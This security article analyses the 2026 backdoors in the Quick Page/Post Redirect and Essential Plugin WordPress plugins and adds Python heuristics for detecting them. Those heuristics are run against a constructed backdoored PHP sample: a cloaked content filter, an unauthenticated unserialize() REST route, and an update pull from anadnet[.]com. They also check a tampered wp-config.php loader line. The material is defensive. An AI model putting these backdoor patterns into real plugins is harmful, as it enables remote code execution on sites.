WordPress Supply Chain Attacks: Dormant Backdoors and RCE in Plugins

Technical analysis of WordPress supply chain attacks: dormant backdoors, RCE, and compromised updates in Quick Page and Essential plugins.


Can an automatic update turn into the most lethal weapon against your website? Just two weeks after the massive Essential Plugin case, the WordPress ecosystem is again in shock due to a dormant backdoor lasting about 5 years in the Quick Page/Post Redirect plugin. On April 30, 2026, WordPress.org temporarily removed the extension, highlighting how attackers exploit trust in updates and code longevity to inject malware and cloaked SEO spam.

The Quick Page/Post Redirect Case: A 5-Year Backdoor

On April 30, 2026, WordPress.org temporarily removed the Quick Page/Post Redirect plugin pending a complete security review. The removal brought to light an unprecedented compromise due to its longevity: the plugin contained a backdoor added about 5 years ago (around 2021) that allowed arbitrary code injection through a hidden auto-update mechanism. The backdoor, in fact, had remained silent and invisible for half a decade.

Attackers built a hidden auto-update mechanism that bypassed the official WordPress update channel: the compromised plugin contacted the external domain anadnet[.]com and could download arbitrary code from it at any time. Through this clandestine channel, a tampered 5.2.3 build was pushed from the external server directly to infected sites. That version added a passive SEO backdoor that altered page output through the 'the_content' filter, but only for logged-out visitors, a cloaking technique that keeps the injected content out of sight of logged-in site administrators.

The Dynamics of the April 2026 Essential Plugin Attack

Although the attacks share the goal of cloaked SEO spam, it is crucial to distinguish the Quick Page/Post Redirect incident from the massive compromise that hit the Essential Plugin company in mid-April 2026. In this second case, the threat did not stem from code dormant for years, but from a malicious acquisition. In early 2025, Essential Plugin was sold to a buyer with a background in the SEO and crypto sectors. The buyer leveraged the new position to insert an RCE (Remote Code Execution) backdoor through a specifically created module, named wpos-analytics.

The vulnerability, introduced and detected in the ecosystem around August 8, 2025, relied on an unserialize() call and an unauthenticated REST API endpoint. The backdoor remained dormant for about 8 months. The activation occurred between April 5 and 6, 2026, injecting code into wp-config.php to ensure persistence. On April 8, 2026, WordPress.org reacted by permanently closing the 31 plugins in the Essential Plugin portfolio and forcing an auto-update (version 2.6.9.1) to neutralize the phone-home logic.
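As an added illustration (not code from either plugin or from the article's sources), the following Python heuristics flag the three patterns described in the two cases above, a 'the_content' filter that behaves differently for logged-out visitors, unserialize() applied to REST request data, and update downloads from a host outside WordPress.org, against a constructed PHP snippet. The function names, regexes, allowlist and sample plugin are assumptions; anadnet[.]com is kept in the defanged form the article uses.

```python
import re

# Assumed allowlist for update traffic; the regexes below are heuristic assumptions.
ALLOWED_HOSTS = {"wordpress.org", "api.wordpress.org", "downloads.wordpress.org"}

SAMPLE_PLUGIN = r"""<?php // constructed sample, not code from either plugin
add_filter('the_content', 'plugin_inject_links');
function plugin_inject_links($content) {
    if (!is_user_logged_in()) { $content .= get_option('plugin_extra_html'); }  // cloaked
    return $content;
}
register_rest_route('example/v1', '/track', array(
    'permission_callback' => '__return_true',   // unauthenticated endpoint
    'callback'            => function ($request) {
        return rest_ensure_response(unserialize($request->get_body()));
    },
));
$pkg = wp_remote_get('https://anadnet[.]com/update.zip');  // off-channel update pull
"""

def find_cloaked_content_filters(src: str) -> list[str]:
    """Callbacks hooked on 'the_content' whose body tests the login state."""
    hits = []
    for m in re.finditer(r"add_filter\(\s*['\"]the_content['\"]\s*,\s*['\"](\w+)['\"]", src):
        body = re.search(r"function\s+%s\s*\([^)]*\)\s*\{(.*?)\n\}" % re.escape(m.group(1)), src, re.S)
        if body and "is_user_logged_in" in body.group(1):
            hits.append(m.group(1))
    return hits

def find_unsafe_unserialize(src: str) -> list[str]:
    """Source lines where unserialize() consumes request or remote-response data."""
    pat = re.compile(r"unserialize\(\s*(\$request|\$_(GET|POST|REQUEST|COOKIE)|wp_remote_retrieve_body)")
    return [ln.strip() for ln in src.splitlines() if pat.search(ln)]

def find_external_update_hosts(src: str) -> list[str]:
    """Hosts used in wp_remote_get/post or download_url that are not WordPress.org."""
    hosts = set()
    for m in re.finditer(r"(?:wp_remote_(?:get|post)|download_url)\(\s*['\"]https?://([^/'\"]+)", src):
        host = m.group(1).lower()
        if host not in ALLOWED_HOSTS and not host.endswith(".wordpress.org"):
            hosts.add(host)
    return sorted(hosts)

def scan(src: str) -> dict[str, list[str]]:
    """Run all three heuristics; an empty dict means nothing was flagged."""
    report = {"cloaked_filters": find_cloaked_content_filters(src),
              "unsafe_unserialize": find_unsafe_unserialize(src),
              "external_hosts": find_external_update_hosts(src)}
    return {k: v for k, v in report.items() if v}
```

These checks are string heuristics, so treat a hit as a prompt for manual review of the flagged callback or route rather than as proof of compromise.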

How Attackers Exploit Trust in the Supply Chain

These two consecutive episodes demonstrate how supply chain attacks are becoming the preferred vector for compromising WordPress sites. By exploiting users' trust in automatic updates and the longevity of plugins present in official directories, attackers manage to inject malicious code on a large scale. The acquisition of Essential Plugin by a buyer with an SEO and crypto background allowed the insertion of an RCE backdoor that remained dormant for about 8 months before activating. Similarly, Quick Page/Post Redirect was compromised about 5 years ago with a hidden auto-update mechanism pointing to external domains to download arbitrary code.

Prevention and Mitigation of Unauthorized Access

Faced with such sophisticated threats, where the update mechanism itself is compromised, simple trust in the official repository is no longer sufficient. Official countermeasures proved necessary: in the Essential Plugin case, WordPress.org permanently closed the 31 plugins and on April 8, 2026, forced an auto-update (v2.6.9.1) to neutralize the phone-home logic. For Quick Page/Post Redirect, WordPress.org temporarily removed the plugin on April 30, 2026, pending review. The longevity of dormant backdoors makes it essential to monitor outbound network traffic to unauthorized external domains, such as anadnet[.]com, and analyze unauthorized changes to critical system files, as happened with wp-config.php.
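For the two monitoring steps just described, this added Python example (not from the article or its sources) checks constructed egress log lines against an allowlist of update hosts and reports lines that appear in wp-config.php relative to a stored baseline; the log format, the allowlist, the baseline and the injected loader line are all assumptions.

```python
import difflib
import hashlib

# Assumed allowlist of hosts a site legitimately contacts for updates; extend per site.
ALLOWED_EGRESS = {"wordpress.org", "api.wordpress.org", "downloads.wordpress.org"}

# Constructed egress log (not real traffic): "<timestamp> <src_ip> <dst_host> <bytes>".
SAMPLE_EGRESS_LOG = """\
2026-04-30T10:01:02Z 10.0.0.5 api.wordpress.org 4812
2026-04-30T10:01:09Z 10.0.0.5 anadnet[.]com 91233
2026-04-30T10:02:41Z 10.0.0.5 downloads.wordpress.org 2210441
"""

# Constructed wp-config.php baseline and a copy with one injected loader line.
BASELINE_CONFIG = """<?php
define('DB_NAME', 'wp');
define('DB_USER', 'wp');
require_once ABSPATH . 'wp-settings.php';
"""
TAMPERED_CONFIG = BASELINE_CONFIG.replace(
    "require_once ABSPATH",
    "@include_once WP_CONTENT_DIR . '/uploads/.cache.php';\nrequire_once ABSPATH")

def normalize_host(host: str) -> str:
    """Undo the defanged form used in advisories (anadnet[.]com) and canonicalise."""
    return host.replace("[.]", ".").lower().rstrip(".")

def unexpected_egress(log: str, allowed=ALLOWED_EGRESS) -> list[tuple[str, str]]:
    """(timestamp, host) for every connection to a host outside the allowlist."""
    findings = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        host = normalize_host(parts[2])
        if host not in allowed and not host.endswith(".wordpress.org"):
            findings.append((parts[0], host))
    return findings

def fingerprint(text: str) -> str:
    """SHA-256 of a config file, suitable for storing as the baseline."""
    return hashlib.sha256(text.encode()).hexdigest()

def config_drift(baseline: str, current: str) -> list[str]:
    """Lines present in the current wp-config.php that the baseline lacks."""
    if fingerprint(baseline) == fingerprint(current):
        return []
    return [ln[2:] for ln in difflib.ndiff(baseline.splitlines(), current.splitlines())
            if ln.startswith("+ ")]
```

Store the baseline fingerprint outside the web root, since an attacker who can write wp-config.php can usually overwrite a baseline kept beside it.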

Frequently Asked Questions

How do supply chain attacks occur in WordPress?
Attackers compromise the software distribution channel, for example by acquiring a developer company or inserting malicious code in an official update. By exploiting users' trust in automatic updates, the malware is installed directly on victim sites without requiring direct interaction.
What is the risk of dormant backdoors in plugins?
A dormant backdoor remains inactive for months or years, making its detection extremely difficult. It allows attackers to accumulate a vast number of infected sites before simultaneously activating the payload, such as the injection of cloaked SEO spam or the modification of database configuration files.
What happened to the Essential Plugin and Quick Page/Post Redirect plugins?
The 31 Essential Plugin plugins were permanently closed on April 8, 2026, after an RCE backdoor, dormant for about 8 months, was activated by injecting code into wp-config.php. On April 30, 2026, Quick Page/Post Redirect was temporarily removed from WordPress.org due to a backdoor added about 5 years ago that allowed arbitrary code injection through a hidden auto-update mechanism.

Incident Summary

Supply chain attacks on WordPress highlight two main compromise vectors: the injection of dormant code in update channels (Quick Page/Post Redirect, about 5 years) and the malicious acquisition of developers to introduce RCE backdoors (Essential Plugin, about 8 months dormant). WordPress.org responded with temporary removal, permanent closure, and forced auto-update (v2.6.9.1) to neutralize phone-home logic. Monitoring traffic to domains like anadnet[.]com and changes to wp-config.php remains fundamental for perimeter security.

This article is a summary based exclusively on the listed sources.
